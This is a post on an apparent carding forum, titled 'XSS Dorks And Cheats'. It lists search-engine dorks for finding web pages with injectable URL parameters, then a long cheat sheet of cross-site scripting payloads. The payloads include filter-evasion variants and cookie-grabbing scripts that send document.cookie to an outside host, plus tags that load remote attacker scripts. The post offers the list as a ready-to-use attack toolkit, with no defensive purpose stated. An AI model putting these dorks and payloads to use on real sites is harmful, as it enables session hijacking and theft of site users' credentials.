XSS Dorks And Cheats

  • This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.
  • For support & Advertisment Contact 

     Jabber   vcarder@inbox.im & ICQ481-465

BlackService

https://www.elitecarders.name
Verfied Vendor
Nov 6, 2011
428
2
18
In Your Heart
#1
Dorks :-
PHP:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:com_feedpostold/feedpost.php?url=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=Search&k=
/preaspjobboard//Employee/emp_login.asp?msg1=
pages/match_report.php?mid= pages/match_report.php?mid=
/notice.php?msg= /notice.php?msg=
/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
/index.php?option=com_easygb&Itemid=
/2wayvideochat/index.php?r=
/view.php?PID= /view.php?PID=
/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
/showproperty.php?id= /showproperty.php?id=
/vehicle/buy_do_search/?order_direction=
/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
/winners.php?year=2008&type= /winners.php?year=2008&type=
/schoolmv2/html/studentmain.php?*******=
/site_search.php?sfunction= /site_search.php?sfunction=
/search.php?search_keywords= /search.php?search_keywords=
/hexjector.php?site= /hexjector.php?site=
/news.php?id= /news.php?id=
/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
intext:"Website by Mile High Creative"
/index.php?option=com_reservations&task=askope&nidser=2&namser="com_reservations"
/info.asp?page=fullstory&key=1&news_type=news&onvan=
/ser/parohija.php?id= /ser/parohija.php?id=
/strane/pas.php?id= /strane/pas.php?id=
/main.php?sid= /main.php?sid=
Cheats :-
PHP:
'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS
 
<script>alert(1);</script>
 
<script>alert('XSS');</script>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
 
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
 
<scr<script>ipt>alert('XSS');</scr</script>ipt>
 
<script>alert(String.fromCharCode(88,83,83))</script>
 
<img src=foo.png onerror=alert(/xssed/) />
 
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
 
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
 
<marquee><script>alert('XSS')</script></marquee>
 
<IMG SRC=\"jav	ascript:alert('XSS');\">
 
<IMG SRC=\"jav
ascript:alert('XSS');\">
 
<IMG SRC=\"jav
ascript:alert('XSS');\">
 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 
"><script>alert(0)</script>
 
<script src=http://yoursite.com/your_files.js></script>
 
</title><script>alert(/xss/)</script>
 
</textarea><script>alert(/xss/)</script>
 
<IMG LOWSRC=\"javascript:alert('XSS')\">
 
<IMG DYNSRC=\"javascript:alert('XSS')\">
 
<font style='color:expression(alert(document.cookie))'>
 
<img src="javascript:alert('XSS')">
 
<script language="JavaScript">alert('XSS')</script>
 
<body onunload="javascript:alert('XSS');">
 
<body onLoad="alert('XSS');"
 
[color=red' onmouseover="alert('xss')"]mouse over[/color]
 
"/></a></><img src=1.gif onerror=alert(1)>
 
window.alert("Bonjour !");
 
<div style="x:expression((window.r==1)?'':eval('r=1;
 
alert(String.fromCharCode(88,83,83));'))">
 
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
 
"><script alert(String.fromCharCode(88,83,83))</script>
 
'>><marquee><h1>XSS</h1></marquee>
 
'">><script>alert('XSS')</script>
 
'">><marquee><h1>XSS</h1></marquee>
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
 
<script>var var = 1; alert(var)</script>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
 
<IMG SRC='vbscript:msgbox(\"XSS\")'>
 
" onfocus=alert(document.domain) "> <"
 
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
 
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
 
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
 
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
 
<br size=\"&{alert('XSS')}\">
 
<scrscriptipt>alert(1)</scrscriptipt>
 
</br style=a:expression(alert())>
 
</script><script>alert(1)</script>
 
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
 
[color=red width=expression(alert(123))][color]
 
<BASE HREF="javascript:alert('XSS');//">
 
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
 
"></iframe><script>alert(123)</script>
 
<body onLoad="while(true) alert('XSS');">
 
'"></title><script>alert(1111)</script>
 
</textarea>'"><script>alert(document.cookie)</script>
 
'""><script language="JavaScript"> alert('X \nS \nS');</script>
 
</script></script><<<<script><>>>><<<script>alert(123)</script>
 
<html><noalert><noscript>(123)</noscript><script>(123)</script>
 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
 
'></select><script>alert(123)</script>
 
'>"><script src = 'http://www.site.com/XSS.js'></script>
 
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
 
<SCRIPT>document.write("XSS");</SCRIPT>
 
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
 
='><script>alert("xss")</script>
 
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
 
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
 
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
 
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
 
src="http://www.site.com/XSS.js"></script>
 
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

!--" /><script>alert('xss');</script>

<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>

'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>

<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>